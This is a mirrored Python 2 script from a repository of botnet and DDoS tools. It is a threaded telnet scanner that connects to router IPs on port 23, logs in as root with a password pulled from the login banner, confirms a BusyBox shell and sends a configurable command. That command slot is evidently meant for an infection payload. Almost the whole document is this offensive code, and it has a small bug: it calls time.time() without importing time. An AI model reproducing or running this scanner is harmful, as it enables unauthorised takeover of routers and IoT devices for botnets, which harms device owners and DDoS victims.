Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/ROUTER SCAN/router_scan.py
5038 views
1
#!/usr/bin/python

2
#Router Scanner 

3


4
import threading

5
import sys, os, re, socket

6
from time import sleep

7
from Queue import *

8
from sys import stdout

9


10
if len(sys.argv) < 3:

11
	print "Usage: python "+sys.argv[0]+" <list> <threads>"

12
	sys.exit()

13


14
ips = open(sys.argv[1], "r").readlines()

15
threads = int(sys.argv[2])

16
queue = Queue()

17
queue_count = 0

18
cmd = ""

19


20
class russian(threading.Thread):

21
	def __init__ (self, ip):

22
		threading.Thread.__init__(self)

23
		self.ip = str(ip).rstrip('\n')

24
	def run(self):

25
		try:

26
			tn = socket.socket()

27
			tn.settimeout(8)

28
			tn.connect((self.ip,23))

29
			sleep(0.2)

30
			check = tn.recv(2048)

31
			checks = re.findall(r'\:\w+', check)

32
			check2 = "".join(checks)

33
			username = "root"

34
			password = check2.replace(":", "")

35
		except Exception:

36
			tn.close()

37
		try:

38
			if "ogin" in check:

39
				tn.send(username + "\n")

40
				sleep(0.09)

41
			elif "assword" in check:

42
				tn.send(password + "\n")

43
				sleep(0.09)

44
		except Exception:

45
			tn.close()

46
		try:

47
			hoho = ''

48
			hoho += readUntil(tn, "assword:")

49
			if "assword" in hoho:

50
				tn.send(password + "\n")

51
				sleep(0.8)

52
			else:

53
				pass

54
		except Exception:

55
			tn.close()

56
		try:

57
			prompt = ''

58
			prompt += tn.recv(40960)

59
			if "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:

60
				try:

61
					success = False

62
					timeout = 8

63
					data = ["BusyBox", "Built-in"]

64
					tn.send("enable" + "\n")

65
					sleep(0.01)

66
					tn.send("sh" + "\n")

67
					sleep(0.01)

68
					tn.send("shell" + "\n")

69
					sleep(0.01)

70
					tn.send("help" + "\n")

71
					sleep(0.01)

72
					tn.send("busybox" + "\r\n")

73
					buf = '' # NO FALSE POSSITIVES OVA HERE

74
					start_time = time.time()

75
					while time.time() - start_time < timeout:

76
						buf += tn.recv(40960)

77
						sleep(0.01)

78
						for info in data:

79
							if info in buf and "unrecognized" not in buf:

80
								success = True

81
				except:

82
					pass

83
			else:

84
				tn.close()

85
			if success == True:

86
				try:

87
					tn.send(cmd + "\r\n")

88
					print "Command Sent!"

89
					sleep(15)

90
					tn.close()

91
				except:

92
					tn.close()

93
			tn.close()

94
		except Exception:

95
			tn.close()

96


97
def readUntil(tn, string, timeout=8):

98
	buf = ''

99
	start_time = time.time()

100
	while time.time() - start_time < timeout:

101
		buf += tn.recv(1024)

102
		sleep(0.01)

103
		if string in buf: return buf

104
	raise Exception('TIMEOUT!')

105


106
def worker():

107
	try:

108
		while True:

109
			try:

110
				ip = queue.get()

111
				thread = russian(ip)

112
				thread.start()

113
				queue.task_done()

114
				sleep(0.2)

115
			except:

116
				pass

117
	except:

118
		pass

119


120
for ip in ips:

121
	queue_count += 1

122
	stdout.write("\r[%d] Added to queue" % queue_count)

123
	stdout.flush()

124
	queue.put(ip)

125
print "\n"

126


127
for l in xrange(threads):

128
	try:

129
		t = threading.Thread(target=worker)

130
		t.start()

131
		sleep(0.01)

132
	except:

133
		pass

134